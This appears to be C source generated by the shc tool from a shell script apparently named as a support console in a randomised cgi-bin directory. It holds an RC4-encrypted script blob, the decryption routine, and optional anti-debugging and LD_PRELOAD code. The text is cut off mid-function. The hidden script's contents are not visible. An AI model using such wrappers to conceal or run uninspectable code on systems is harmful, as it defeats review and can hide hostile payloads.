#if 0
	shc Version 4.0.3, Generic Shell Script Compiler
	GNU GPL Version 3 Md Jahidul Hamid <jahidulhamid@yahoo.com>

	shc -r -f /tmp/cgi-bin/ajsdhada1563axa184dsanj_support/support_easy_console.sh 
#endif

static  char data [] = 
#define      date_z	1
#define      date	((&data[0]))
	"\253"
#define      pswd_z	256
#define      pswd	((&data[61]))
	"\045\221\171\313\161\037\103\020\313\062\334\036\206\265\245\017"
	"\316\327\041\252\364\243\272\313\145\355\354\360\366\334\372\033"
	"\156\163\347\337\223\053\360\137\136\315\175\345\202\043\364\121"
	"\372\025\373\356\271\266\272\037\243\246\017\231\323\016\040\257"
	"\173\310\372\257\340\315\251\347\073\320\106\245\235\312\366\360"
	"\141\370\106\167\064\232\042\020\146\134\351\072\152\012\351\345"
	"\322\344\224\262\261\076\231\355\016\340\223\254\253\212\234\015"
	"\202\343\204\267\176\247\307\344\003\261\036\155\273\007\123\216"
	"\354\350\100\235\047\332\213\066\273\036\342\146\251\177\164\054"
	"\143\370\343\341\237\253\305\243\135\343\021\031\353\145\247\330"
	"\115\350\165\164\302\001\253\175\040\215\344\311\015\130\365\160"
	"\121\330\121\361\204\027\224\341\372\246\372\346\013\242\276\130"
	"\212\064\315\114\065\170\312\126\006\257\037\023\010\024\203\131"
	"\355\324\113\162\353\337\123\346\206\116\315\221\360\214\351\172"
	"\300\267\307\366\060\222\114\066\101\153\111\112\200\315\243\155"
	"\241\356\337\215\316\063\164\125\202\102\346\162\316\320\355\217"
	"\207\264\205\270\106\322\356\210\076\070\322\276\005\166\054\246"
	"\145\014\064\064\100\251\211\302\353\157\064\272\100\041\111\310"
	"\326\317\200\035\241\156\245\340\246\170\237\253\356\313\122\124"
	"\330\207\210\031\061\022\333\035\201\020\327\302\203\011"
#define      rlax_z	1
#define      rlax	((&data[319]))
	"\104"
#define      msg2_z	19
#define      msg2	((&data[324]))
	"\310\302\161\046\162\001\145\002\027\316\033\031\061\352\060\337"
	"\302\060\035\011\045\122\244"
#define      chk1_z	22
#define      chk1	((&data[348]))
	"\022\022\000\143\015\033\337\364\072\061\145\021\356\113\377\271"
	"\251\336\042\303\373\076\350\241\043\175\342"
#define      msg1_z	65
#define      msg1	((&data[376]))
	"\317\025\266\356\270\135\020\146\037\225\273\312\134\126\046\113"
	"\150\353\254\165\211\261\041\173\273\320\201\212\221\150\127\155"
	"\321\064\037\302\365\350\364\254\341\375\254\362\101\072\053\275"
	"\123\275\067\125\041\016\337\370\272\020\367\076\220\017\234\244"
	"\165\123\010\261\056\101\124\375\122\341\007\007\322\205\244\243"
	"\226\155\145\007\223\365\366"
#define      opts_z	1
#define      opts	((&data[457]))
	"\037"
#define      text_z	3591
#define      text	((&data[834]))
	"\265\312\022\205\337\311\163\230\046\161\352\007\171\362\332\376"
	"\226\176\225\003\344\235\227\331\223\067\341\234\326\114\263\214"
	"\027\305\021\367\216\205\220\265\366\172\275\160\155\227\156\004"
	"\025\004\010\371\241\240\323\065\327\264\322\256\001\205\072\031"
	"\113\114\020\331\321\240\217\310\033\114\070\210\343\247\215\371"
	"\253\225\363\114\065\306\202\014\173\124\272\175\331\365\226\044"
	"\101\247\376\022\107\216\333\143\332\024\354\276\273\171\267\147"
	"\016\253\263\104\161\066\121\355\212\013\152\144\001\001\211\102"
	"\250\210\125\360\026\060\123\360\104\077\257\000\271\146\147\310"
	"\021\033\014\203\121\135\161\333\151\334\100\152\335\312\255\206"
	"\122\002\166\150\063\312\131\167\012\010\167\303\157\336\214\201"
	"\372\230\004\113\366\166\047\140\122\147\313\060\061\170\266\204"
	"\172\055\354\255\370\106\045\002\116\235\306\276\174\122\077\166"
	"\353\104\301\342\272\351\102\014\121\016\075\203\206\364\007\001"
	"\041\364\257\032\072\324\034\211\162\343\107\356\066\206\145\042"
	"\312\046\004\205\020\107\221\141\125\317\344\333\303\354\335\344"
	"\340\214\376\033\141\033\245\323\377\354\302\065\163\047\127\076"
	"\116\134\303\136\243\125\300\370\044\245\324\347\221\261\314\162"
	"\076\313\215\237\347\062\163\346\037\066\034\223\135\164\321\254"
	"\320\224\012\164\352\313\155\016\160\101\366\001\363\303\163\062"
	"\217\001\322\166\064\105\135\123\173\172\346\331\356\270\205\277"
	"\115\220\063\067\133\240\106\314\342\074\315\325\000\101\010\217"
	"\103\332\006\167\037\144\313\233\336\262\164\315\152\372\214\267"
	"\212\277\356\346\137\064\262\101\177\146\175\305\266\100\120\107"
	"\213\206\260\222\243\317\066\027\201\315\374\123\325\037\041\070"
	"\121\307\175\240\143\122\312\060\060\215\211\261\231\301\376\117"
	"\145\063\077\251\222\131\353\207\267\343\002\305\155\152\150\104"
	"\317\212\164\103\135\241\265\256\070\124\064\376\345\333\111\014"
	"\254\240\025\302\264\303\323\163\145\074\171\104\055\201\250\237"
	"\037\370\034\276\305\313\150\305\234\040\217\135\247\245\327\037"
	"\000\030\153\246\062\251\111\112\374\032\326\075\330\061\251\262"
	"\240\200\047\203\262\103\041\027\274\315\032\372\111\326\370\106"
	"\233\041\077\132\007\131\141\027\041\324\275\265\342\360\366\156"
	"\270\331\141\013\276\251\156\055\217\214\002\075\264\265\103\345"
	"\004\137\231\226\325\057\121\076\272\221\362\371\022\172\170\227"
	"\120\217\201\352\136\125\167\204\354\244\327\206\151\270\103\323"
	"\126\216\077\047\317\232\166\151\301\014\145\035\361\130\277\275"
	"\363\103\222\142\124\374\034\037\076\313\273\035\066\223\330\336"
	"\236\003\121\251\154\111\162\153\043\052\203\217\224\151\305\163"
	"\073\040\116\234\315\033\034\012\047\173\022\232\137\202\341\377"
	"\014\100\070\257\100\323\274\321\247\076\224\370\273\045\010\122"
	"\307\321\242\347\315\134\360\375\034\277\251\233\235\113\026\016"
	"\243\304\222\241\075\146\333\044\051\220\271\041\210\327\371\365"
	"\373\250\257\156\155\365\037\027\276\302\263\314\273\113\015\343"
	"\205\106\027\123\263\165\067\030\356\103\371\000\325\320\337\361"
	"\066\150\376\200\062\073\311\273\367\166\246\357\033\157\060\205"
	"\170\346\013\177\103\260\240\263\274\235\353\217\313\304\307\042"
	"\002\371\344\377\001\034\103\016\120\102\310\010\245\373\312\103"
	"\332\014\154\263\262\045\365\053\201\062\252\370\152\215\377\064"
	"\120\267\344\103\146\274\244\044\166\304\125\371\007\057\307\111"
	"\052\326\025\022\202\201\000\160\152\117\353\006\231\056\047\057"
	"\217\352\022\166\173\274\065\342\127\026\036\350\251\152\207\273"
	"\131\052\074\025\340\361\354\033\372\130\152\341\021\057\344\055"
	"\202\355\121\132\021\357\136\231\032\272\101\145\137\344\115\305"
	"\222\107\035\143\333\161\251\165\203\046\001\267\136\223\163\172"
	"\034\035\172\225\125\332\035\342\173\322\074\121\214\341\367\156"
	"\312\152\234\325\153\151\352\312\254\334\070\134\064\235\016\252"
	"\076\263\154\062\375\104\072\375\167\162\272\121\014\145\006\122"
	"\201\153\200\065\076\201\256\042\362\146\203\072\027\057\323\046"
	"\026\376\072\162\000\311\066\071\126\017\125\135\001\321\246\355"
	"\020\130\072\041\336\333\310\013\336\261\134\154\326\145\144\066"
	"\300\134\351\043\227\103\050\150\133\306\112\026\213\135\103\251"
	"\251\105\057\155\211\266\227\063\107\115\101\026\255\326\351\177"
	"\050\336\023\077\275\141\270\306\345\331\112\225\006\251\014\111"
	"\213\324\156\254\334\360\274\252\104\227\227\072\117\350\212\352"
	"\266\103\007\150\077\251\247\304\155\141\176\211\117\007\373\101"
	"\205\122\125\144\175\360\022\006\260\115\365\134\175\347\337\032"
	"\371\340\037\344\011\156\372\215\141\000\071\013\046\370\066\301"
	"\230\213\133\276\201\105\105\112\156\344\116\053\036\321\221\002"
	"\113\004\251\361\376\003\310\256\025\023\133\127\121\145\140\312"
	"\112\310\015\235\370\235\013\265\076\014\043\042\211\332\102\205"
	"\241\073\334\261\047\217\213\027\335\117\323\226\257\135\314\305"
	"\252\152\211\322\230\172\060\123\064\023\212\303\043\141\205\021"
	"\264\257\013\142\364\153\222\023\124\223\310\070\122\114\076\312"
	"\137\346\211\067\001\220\070\127\230\054\327\302\274\027\163\375"
	"\364\154\012\314\366\303\140\274\317\304\261\070\154\010\113\136"
	"\105\331\160\231\353\023\134\270\142\146\064\336\141\065\215\253"
	"\243\144\215\377\245\077\027\357\055\017\037\352\112\153\027\201"
	"\210\205\152\353\211\102\273\333\362\154\231\076\255\266\027\302"
	"\044\057\017\241\167\164\351\224\063\174\136\324\123\212\305\020"
	"\311\352\040\163\036\200\173\000\246\323\237\042\241\375\045\207"
	"\025\022\023\354\327\222\051\150\351\002\052\050\062\100\174\131"
	"\204\027\361\256\115\011\011\141\155\231\325\225\337\065\301\315"
	"\050\030\110\106\342\304\017\153\260\220\374\230\355\053\061\020"
	"\276\054\372\253\335\110\004\210\343\220\061\322\352\143\251\077"
	"\210\075\160\146\070\240\217\313\230\240\223\030\263\112\133\351"
	"\047\100\342\035\066\340\032\236\050\115\033\116\033\010\272\257"
	"\234\213\255\147\152\120\311\014\303\041\015\170\371\277\113\254"
	"\053\314\124\003\106\233\377\056\221\322\041\077\300\165\034\324"
	"\340\331\034\131\036\236\364\365\363\277\360\155\375\040\171\040"
	"\070\053\214\317\035\173\267\107\276\252\133\243\112\225\257\323"
	"\255\101\357\146\335\276\377\246\113\327\357\152\300\306\351\027"
	"\041\115\040\007\264\045\211\200\371\162\356\221\147\142\201\216"
	"\133\013\106\245\007\330\246\137\041\021\251\367\346\242\027\323"
	"\373\277\041\166\025\061\253\117\062\136\032\004\253\307\020\152"
	"\116\352\207\103\306\141\356\002\041\043\276\005\000\314\163\146"
	"\233\220\167\352\337\166\141\172\234\253\010\010\361\353\070\251"
	"\300\172\353\246\246\313\137\321\013\331\277\176\165\372\100\344"
	"\047\330\273\343\355\121\315\372\230\105\117\165\225\206\206\142"
	"\233\042\116\301\275\121\024\024\040\314\237\360\107\060\302\107"
	"\352\173\072\200\121\122\370\306\005\300\176\343\303\306\351\013"
	"\152\202\103\100\105\237\017\375\336\153\357\032\114\272\065\073"
	"\331\167\176\251\177\120\204\236\020\143\020\234\076\201\114\012"
	"\016\235\337\155\021\175\134\164\250\065\345\252\216\072\043\257"
	"\334\037\207\270\363\111\126\272\356\251\067\326\012\223\233\353"
	"\021\027\271\325\050\000\220\034\067\023\106\123\366\246\125\213"
	"\241\262\302\031\247\246\334\045\075\337\142\176\310\016\040\007"
	"\036\161\110\002\216\112\223\072\046\145\205\033\310\323\346\175"
	"\257\062\074\253\113\007\151\000\163\106\123\063\105\156\341\000"
	"\321\137\215\311\121\161\227\074\127\157\102\077\040\147\000\036"
	"\035\142\246\127\052\307\006\152\102\034\223\376\351\165\004\000"
	"\155\171\172\032\222\256\172\253\231\237\302\364\171\236\143\071"
	"\251\263\216\307\246\150\214\012\057\267\050\323\136\367\061\327"
	"\204\252\115\214\035\107\055\000\036\377\010\344\372\051\000\054"
	"\105\176\277\016\345\124\106\237\224\034\375\001\060\150\235\271"
	"\043\267\336\324\147\061\260\020\035\127\353\344\200\344\221\161"
	"\024\003\123\064\121\356\051\264\371\022\217\364\226\135\126\154"
	"\153\002\217\266\161\303\357\120\215\304\345\366\003\077\056\070"
	"\063\150\241\034\217\217\146\324\255\343\203\342\050\100\145\120"
	"\105\162\344\364\342\046\023\217\353\256\133\024\212\335\373\153"
	"\250\073\230\373\022\226\024\103\114\060\037\362\105\137\044\376"
	"\253\036\161\035\006\354\147\067\344\245\067\116\017\340\227\102"
	"\305\142\137\074\006\101\325\231\356\360\034\244\176\226\064\127"
	"\317\371\153\213\330\124\053\025\076\210\306\340\022\057\310\171"
	"\206\207\171\300\043\305\142\160\035\043\161\254\056\024\316\234"
	"\263\265\344\060\173\337\312\003\101\301\260\253\257\373\244\167"
	"\365\113\172\253\070\270\145\374\170\346\134\312\024\065\074\200"
	"\272\337\043\156\034\001\177\144\271\167\111\073\101\176\237\056"
	"\034\256\234\035\063\042\167\130\174\302\014\355\074\327\332\275"
	"\263\066\266\352\161\234\213\206\010\062\315\166\076\216\203\234"
	"\364\310\353\152\250\041\210\333\237\174\353\243\006\172\132\315"
	"\367\306\020\033\005\165\346\276\136\320\104\217\330\151\207\301"
	"\100\134\104\201\321\155\277\123\274\354\304\156\054\027\361\131"
	"\002\161\075\266\074\257\154\064\031\153\071\171\307\332\367\246"
	"\121\357\071\117\201\160\010\347\032\033\070\103\374\125\236\113"
	"\021\305\056\160\366\371\107\235\335\371\225\100\015\103\077\333"
	"\307\057\160\021\014\152\054\242\127\123\064\341\141\124\065\011"
	"\004\110\106\161\033\031\365\103\100\070\066\364\214\060\275\372"
	"\336\066\130\363\143\252\227\125\267\050\367\376\242\371\216\341"
	"\336\157\044\031\156\114\211\122\251\123\166\331\324\116\120\336"
	"\011\216\105\265\172\053\054\020\364\020\210\256\315\230\123\340"
	"\161\352\170\161\351\224\265\222\231\312\336\340\266\264\330\107"
	"\362\120\350\245\235\174\175\122\340\242\146\361\176\233\111\062"
	"\274\365\316\157\256\267\166\300\352\073\264\022\260\057\061\127"
	"\245\122\334\007\303\130\074\262\013\214\073\123\260\003\071\064"
	"\053\060\007\274\363\327\034\231\222\326\036\206\344\214\005\373"
	"\006\125\345\273\333\357\057\353\037\035\033\222\162\237\060\052"
	"\163\074\065\327\310\316\044\047\321\337\247\264\357\021\203\342"
	"\033\323\176\024\347\377\336\144\146\365\247\361\116\322\271\301"
	"\317\263\203\173\207\026\011\031\265\275\130\300\224\153\264\245"
	"\321\145\311\377\234\246\040\375\347\145\317\067\146\147\065\133"
	"\105\317\332\044\120\026\157\041\216\304\227\124\202\071\135\327"
	"\042\024\303\147\014\332\357\155\213\324\171\171\247\274\000\251"
	"\103\317\100\024\120\371\151\005\200\166\304\146\126\206\056\047"
	"\003\213\004\077\107\046\357\012\067\175\354\042\257\261\271\312"
	"\014\005\031\337\261\024\226\252\265\105\136\214\033\043\035\377"
	"\327\047\025\340\345\036\206\255\237\130\310\072\057\074\236\276"
	"\035\111\353\301\310\303\057\044\273\057\365\227\244\272\032\057"
	"\363\131\011\367\076\261\376\104\371\062\120\121\277\306\137\200"
	"\227\170\135\057\263\030\016\101\163\132\310\141\165\364\077\046"
	"\107\114\337\245\151\057\353\125\253\044\341\251\070\103\057\263"
	"\266\346\231\060\215\157\271\107\346\251\075\025\217\261\232\132"
	"\066\347\324\032\024\242\076\343\212\117\060\314\326\122\024\326"
	"\215\323\175\021\237\275\141\266\152\004\262\371\107\052\055\066"
	"\212\277\027\263\156\270\052\153\070\041\341\020\072\002\156\265"
	"\171\342\375\202\167\316\330\046\351\240\156\011\027\353\002\367"
	"\074\222\107\010\065\222\027\261\271\371\214\306\035\035\045\300"
	"\203\160\222\024\000\174\275\210\251\067\124\054\037\243\126\101"
	"\356\054\036\146\324\274\133\074\047\376\044\001\027\227\357\225"
	"\205\253\274\053\331\151\122\062\116\306\013\031\306\070\255\107"
	"\010\024\047\024\232\162\130\265\054\200\170\253\142\221\227\071"
	"\314\151\115\042\136\313\055\375\003\320\244\333\134\116\363\240"
	"\264\355\224\207\064\257\233\033\045\067\263\305\144\250\340\323"
	"\324\112\354\316\330\334\250\052\064\140\256\350\206\246\265\112"
	"\007\100\022\221\171\167\342\153\265\155\323\377\234\064\020\073"
	"\346\244\350\172\213\110\275\224\006\077\163\001\023\221\307\231"
	"\206\203\040\323\065\340\002\372\033\015\033\164\023\102\103\076"
	"\012\235\143\154\006\130\322\360\010\257\307\377\163\264\003\204"
	"\206\176\267\261\142\166\370\005\200\321\214\123\060\371\164\347"
	"\300\100\172\215\356\054\070\133\342\274\327\253\014\012\014\027"
	"\272\365\355\345\026\077\117\372\164\144\275\304\310\327\264\212"
	"\354\301\205\351\313\005\345\206\261\032\307\176\241\220\103\021"
	"\372\310\201\173\323\026\136\334\240\234\166\233\364\213\002\345"
	"\271\012\224\327\367\070\037\274\006\316\207\216\270\320\377\157"
	"\204\016\133\342\100\276\101\011\360\050\203\112\271\045\265\130"
	"\353\160\176\045\105\103\002\277\322\260\061\025\014\014\342\240"
	"\036\252\045\311\360\244\151\246\347\204\170\231\176\130\014\336"
	"\261\111\115\314\037\164\142\043\376\303\116\147\023\042\266\334"
	"\276\356\355\000\173\010\124\366\311\277\357\123\132\056\020\013"
	"\366\175\241\177\334\372\260\274\050\114\157\221\276\112\020\155"
	"\064\072\170\042\001\234\346\260\042\313\004\022\021\257\256\374"
	"\325\213\231\133\010\123\367\347\020\236\043\042\106\101\162\056"
	"\346\063\306\330\134\245\142\226\126\215\206\114\366\152\314\022"
	"\015\040\204\211\127\160\030\310\166\136\171\353\024\112\004\250"
	"\033\356\306\373\370\354\070\355\317\357\371\145\077\317\275\367"
	"\226\004\257\004\036\122\172\105\171\114\033\165\124\256\374\051"
	"\203\113\345\246\061\054\324\340\034\344\070\107\026\115\155\124"
	"\321\262\340\154\351\324\215\207\163\027\110\375\311\303\354\312"
	"\124\211\175\115\076\053\362\042\053\310\304\266\065\341\337\221"
	"\207\203\043\355\050\005\106\323\243\176\343\251\324\266\337\066"
	"\047\217\100\044\117\235\361\324\120\071\011\222\322\030\352\116"
	"\244\155\220\215\264\224\041\320\127\332\253\036\261\026\264\216"
	"\144\376\351\120\367\061\061\325\052\147\224\160\054\247\345\077"
	"\271\175\267\011\326\242\224\253\024\234\326\147\264\142\147\046"
	"\206\264\224\262\203\137\244\376\120\125\107\140\122\034\353\205"
	"\234\001\261\217\152\122\136\147\232\003\054\130\346\165\007\026"
	"\051\023\130\157\256\367\232\156\210\046\260\030\150\232\131\305"
	"\143\117\362\002\050\363\200\235\175\202\336\067\064\101\142\115"
	"\220\345\275\126\374\344\021\145\362\174\223\065\161\020\210\107"
	"\371\134\152\001\362\211\144\072\061\340\374\064\237\134\127\312"
	"\077\020\375\104\237\147\236\014\307\333\031\063\013\120\317\226"
	"\146\223\310\373\251\371\107\257\062\027\052\156\124\356\063\007"
	"\331\327\304\310\127\316\130\114\203\023\251\135\201\256\117\273"
	"\037\160\172\370\065\344\027\306\204\156\343\017\035\352\226\175"
	"\151\031\233\325\337\013\304\114\246\134\204\154\027\225\276\354"
	"\145\227\164\236\233\040\235\076\141\050\064\073\001\315\145\072"
	"\272\046\115\305\160\140\330\207\133\323\165\347\323\026\073\202"
	"\016\155\055\152\353\344\226\043\112\302\043\374\261\046\053\352"
	"\360\223\367\215\055\261\172\127\334\264\272\207\213\302\227\312"
	"\341\247\123\005\021\022\107\016\050\271\021\154\044\273\273\234"
	"\233\224\162\165\175\113\153\066\256\237\110\030\245\342\166\360"
	"\115\272\070\354\316\247\202\327\047\251\231\226\013\274\062\361"
	"\016\137\133\027\363\363\311\233\131\105\360\072\021\117\151\262"
	"\335\173\006\133\311\263\044\223\151\105\146\236\305\157\161\126"
	"\177\367\352\267\315\301\163\145\206\102\360\100\212\151\113\062"
	"\257\006\042\265\006\014\063\256\244\113\133\374\237\036\271\173"
	"\106\166\273\362\040\074\316\150\062\075\170\265\314\046\256\200"
	"\222\364\244\122\103\130\224\241\126\351\265\346\327\036\121\061"
	"\202\127\332\272\134\166\236\164\246\264\127\226\207\260\376\372"
	"\374\343\311\331\237\351\142\242\115\333\051\205\260\042\342\027"
	"\325\341\000\202\152\266\043\243\335\065\103\225\040\327\161\315"
	"\170\025\376\017\276\217\337\210\217\105\010\312\104\252\355\253"
	"\256\076\036\132\203\141\140\042\031\150\251\222\033\014\204\346"
	"\013\103\211\225\102\201\207\324\176\141\254\236\123\001\076\356"
	"\223\030\205\051\353\152\025\053\371\163\305\307\030\252\127\066"
	"\021\246\307\316\147\317\204\064\273\273\335\272\130\222\367\316"
	"\062\051\026\112\350\302\251\102\113\131\270\127\305\264\062\377"
	"\107\206\362\047\224\150\107\120\040\234\257\143\104\046\066\363"
	"\111\077\363\015\207\150\340\254\221\153\300\262\026\275\225\301"
	"\154\227\334\045\215\134\034\332\224\152\276\352\133\103\011\070"
	"\101\302\072\207\147\323\344\021\355\253\252\170\137\323\242\243"
	"\360\232\230\337\325\323\013\050\271\335\200\016\353\257\271\121"
	"\233\267\375\274\020\245\015\132\160\025\364\151\227\003\101\234"
	"\127\036\171\035\027\124\104\242\025\255\122\271\046\075\256\362"
	"\221\056\242\063\067\131\104\056\275\127\241\317\137\250\375\367"
	"\034\157\150\017\306\005\006\214\246\326\000\056\302\172\313\061"
	"\316\147\023\373\123\170\273\371\233\232\213\107\312\205\215\237"
	"\271\046\223\161\002\307\242\252\337\061\362\003\250\041\116\161"
	"\200\027\162\302\040\002\005\372\010\174\032\154\110\265\113\372"
	"\052\030\144\044\244\033\256\144\012\224\303\077\107\005\260\307"
	"\035\043\211\075\045\216\067\056\013\122\233\123\007\346\115\062"
	"\377\261\126\244\315\005\010\327\232\314\026\341\321\307\250\357"
	"\352\061\054\020\300\144\076\313\266\331\037\276\300"
#define      lsto_z	1
#define      lsto	((&data[4503]))
	"\000"
#define      shll_z	10
#define      shll	((&data[4504]))
	"\060\167\261\273\251\275\057\060\124\210\354"
#define      inlo_z	3
#define      inlo	((&data[4515]))
	"\205\145\323"
#define      tst2_z	19
#define      tst2	((&data[4519]))
	"\310\163\375\327\004\374\236\230\213\135\223\212\320\136\026\126"
	"\047\303\003\033\011\242\160\370"
#define      chk2_z	19
#define      chk2	((&data[4545]))
	"\235\142\212\265\316\367\037\110\114\307\361\315\041\023\202\324"
	"\127\026\041\155\111\204"
#define      xecc_z	15
#define      xecc	((&data[4564]))
	"\151\012\101\200\064\000\206\233\003\137\224\302\326\366\307\265"
#define      tst1_z	22
#define      tst1	((&data[4585]))
	"\272\360\064\331\067\060\050\146\043\271\210\076\320\374\000\336"
	"\072\317\126\213\046\017\113\271\103\273\315\230\305"/* End of data[] */;
#define      hide_z	4096
#define SETUID 0	/* Define as 1 to call setuid(0) at start of script */
#define DEBUGEXEC	0	/* Define as 1 to debug execvp calls */
#define TRACEABLE	1	/* Define as 1 to enable ptrace the executable */
#define HARDENING	0	/* Define as 1 to disable ptrace/dump the executable */
#define BUSYBOXON	0	/* Define as 1 to enable work with busybox */

#if HARDENING
static const char * shc_x[] = {
"/*",
" * Copyright 2019 - Intika <intika@librefox.org>",
" * Replace ******** with secret read from fd 21",
" * Also change arguments location of sub commands (sh script commands)",
" * gcc -Wall -fpic -shared -o shc_secret.so shc_secret.c -ldl",
" */",
"",
"#define _GNU_SOURCE /* needed to get RTLD_NEXT defined in dlfcn.h */",
"#define PLACEHOLDER \"********\"",
"#include <dlfcn.h>",
"#include <stdlib.h>",
"#include <string.h>",
"#include <unistd.h>",
"#include <stdio.h>",
"#include <signal.h>",
"",
"static char secret[128000]; //max size",
"typedef int (*pfi)(int, char **, char **);",
"static pfi real_main;",
"",
"// copy argv to new location",
"char **copyargs(int argc, char** argv){",
"    char **newargv = malloc((argc+1)*sizeof(*argv));",
"    char *from,*to;",
"    int i,len;",
"",
"    for(i = 0; i<argc; i++){",
"        from = argv[i];",
"        len = strlen(from)+1;",
"        to = malloc(len);",
"        memcpy(to,from,len);",
"        // zap old argv space",
"        memset(from,'\\0',len);",
"        newargv[i] = to;",
"        argv[i] = 0;",
"    }",
"    newargv[argc] = 0;",
"    return newargv;",
"}",
"",
"static int mymain(int argc, char** argv, char** env) {",
"    //fprintf(stderr, \"Inject main argc = %d\\n\", argc);",
"    return real_main(argc, copyargs(argc,argv), env);",
"}",
"",
"int __libc_start_main(int (*main) (int, char**, char**),",
"                      int argc,",
"                      char **argv,",
"                      void (*init) (void),",
"                      void (*fini)(void),",
"                      void (*rtld_fini)(void),",
"                      void (*stack_end)){",
"    static int (*real___libc_start_main)() = NULL;",
"    int n;",
"",
"    if (!real___libc_start_main) {",
"        real___libc_start_main = dlsym(RTLD_NEXT, \"__libc_start_main\");",
"        if (!real___libc_start_main) abort();",
"    }",
"",
"    n = read(21, secret, sizeof(secret));",
"    if (n > 0) {",
"      int i;",
"",
"    if (secret[n - 1] == '\\n') secret[--n] = '\\0';",
"    for (i = 1; i < argc; i++)",
"        if (strcmp(argv[i], PLACEHOLDER) == 0)",
"          argv[i] = secret;",
"    }",
"",
"    real_main = main;",
"",
"    return real___libc_start_main(mymain, argc, argv, init, fini, rtld_fini, stack_end);",
"}",
"",
0};
#endif /* HARDENING */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* 'Alleged RC4' */

static unsigned char stte[256], indx, jndx, kndx;

/*
 * Reset arc4 stte. 
 */
void stte_0(void)
{
	indx = jndx = kndx = 0;
	do {
		stte[indx] = indx;
	} while (++indx);
}

/*
 * Set key. Can be used more than once. 
 */
void key(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		do {
			tmp = stte[indx];
			kndx += tmp;
			kndx += ptr[(int)indx % len];
			stte[indx] = stte[kndx];
			stte[kndx] = tmp;
		} while (++indx);
		ptr += 256;
		len -= 256;
	}
}

/*
 * Crypt data. 
 */
void arc4(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		indx++;
		tmp = stte[indx];
		jndx += tmp;
		stte[indx] = stte[jndx];
		stte[jndx] = tmp;
		tmp += stte[indx];
		*ptr ^= stte[tmp];
		ptr++;
		len--;
	}
}

/* End of ARC4 */

#if HARDENING

#include <sys/ptrace.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/prctl.h>
#define PR_SET_PTRACER 0x59616d61

/* Seccomp Sandboxing Init */
#include <stdlib.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>

#include <linux/filter.h>
#include <linux/seccomp.h>
#include <linux/audit.h>

#define ArchField offsetof(struct seccomp_data, arch)

#define Allow(syscall) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, SYS_##syscall, 0, 1), \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

struct sock_filter filter[] = {
    /* validate arch */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, ArchField),
    BPF_JUMP( BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),

    /* load syscall */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, nr)),

    /* list of allowed syscalls */
    Allow(exit_group),  /* exits a process */
    Allow(brk),         /* for malloc(), inside libc */
    Allow(mmap),        /* also for malloc() */
    Allow(munmap),      /* for free(), inside libc */

    /* and if we don't match above, die */
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog filterprog = {
    .len = sizeof(filter)/sizeof(filter[0]),
    .filter = filter
};

/* Seccomp Sandboxing - Set up the restricted environment */
void seccomp_hardening() {
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
        perror("Could not start seccomp:");
        exit(1);
    }
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filterprog) == -1) {
        perror("Could not start seccomp:");
        exit(1);
    }
} 
/* End Seccomp Sandboxing Init */

void shc_x_file() {
    FILE *fp;
    int line = 0;

    if ((fp = fopen("/tmp/shc_x.c", "w")) == NULL ) {exit(1); exit(1);}
    for (line = 0; shc_x[line]; line++)	fprintf(fp, "%s\n", shc_x[line]);
    fflush(fp);fclose(fp);
}

int make() {
	char * cc, * cflags, * ldflags;
    char cmd[4096];

	cc = getenv("CC");
	if (!cc) cc = "cc";

	sprintf(cmd, "%s %s -o %s %s", cc, "-Wall -fpic -shared", "/tmp/shc_x.so", "/tmp/shc_x.c -ldl");
	if (system(cmd)) {remove("/tmp/shc_x.c"); return -1;}
	remove("/tmp/shc_x.c"); return 0;
}

void arc4_hardrun(void * str, int len) {
    //Decode locally
    char tmp2[len];
    char tmp3[len+1024];
    memcpy(tmp2, str, len);

	unsigned char tmp, * ptr = (unsigned char *)tmp2;
    int lentmp = len;
    int pid, status;
    pid = fork();

    shc_x_file();
    if (make()) {exit(1);}

    setenv("LD_PRELOAD","/tmp/shc_x.so",1);

    if(pid==0) {

        //Start tracing to protect from dump & trace
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
            kill(getpid(), SIGKILL);
            _exit(1);
        }

        //Decode Bash
        while (len > 0) {
            indx++;
            tmp = stte[indx];
            jndx += tmp;
            stte[indx] = stte[jndx];
            stte[jndx] = tmp;
            tmp += stte[indx];
            *ptr ^= stte[tmp];
            ptr++;
            len--;
        }

        //Do the magic
        sprintf(tmp3, "%s %s", "'********' 21<<<", tmp2);

        //Exec bash script //fork execl with 'sh -c'
        system(tmp2);

        //Empty script variable
        memcpy(tmp2, str, lentmp);

        //Clean temp
        remove("/tmp/shc_x.so");

        //Sinal to detach ptrace
        ptrace(PTRACE_DETACH, 0, 0, 0);
        exit(0);
    }
    else {wait(&status);}

    /* Seccomp Sandboxing - Start */
    seccomp_hardening();

    exit(0);
}
#endif /* HARDENING */

/*
 * Key with file invariants. 
 */
int key_with_file(char * file)
{
	struct stat statf[1];
	struct stat control[1];

	if (stat(file, statf) < 0)
		return -1;

	/* Turn on stable fields */
	memset(control, 0, sizeof(control));
	control->st_ino = statf->st_ino;
	control->st_dev = statf->st_dev;
	control->st_rdev = statf->st_rdev;
	control->st_uid = statf->st_uid;
	control->st_gid = statf->st_gid;
	control->st_size = statf->st_size;
	control->st_mtime = statf->st_mtime;
	control->st_ctime = statf->st_ctime;
	key(control, sizeof(control));
	return 0;
}

#if DEBUGEXEC
void debugexec(char * sh11, int argc, char ** argv)
{
	int i;
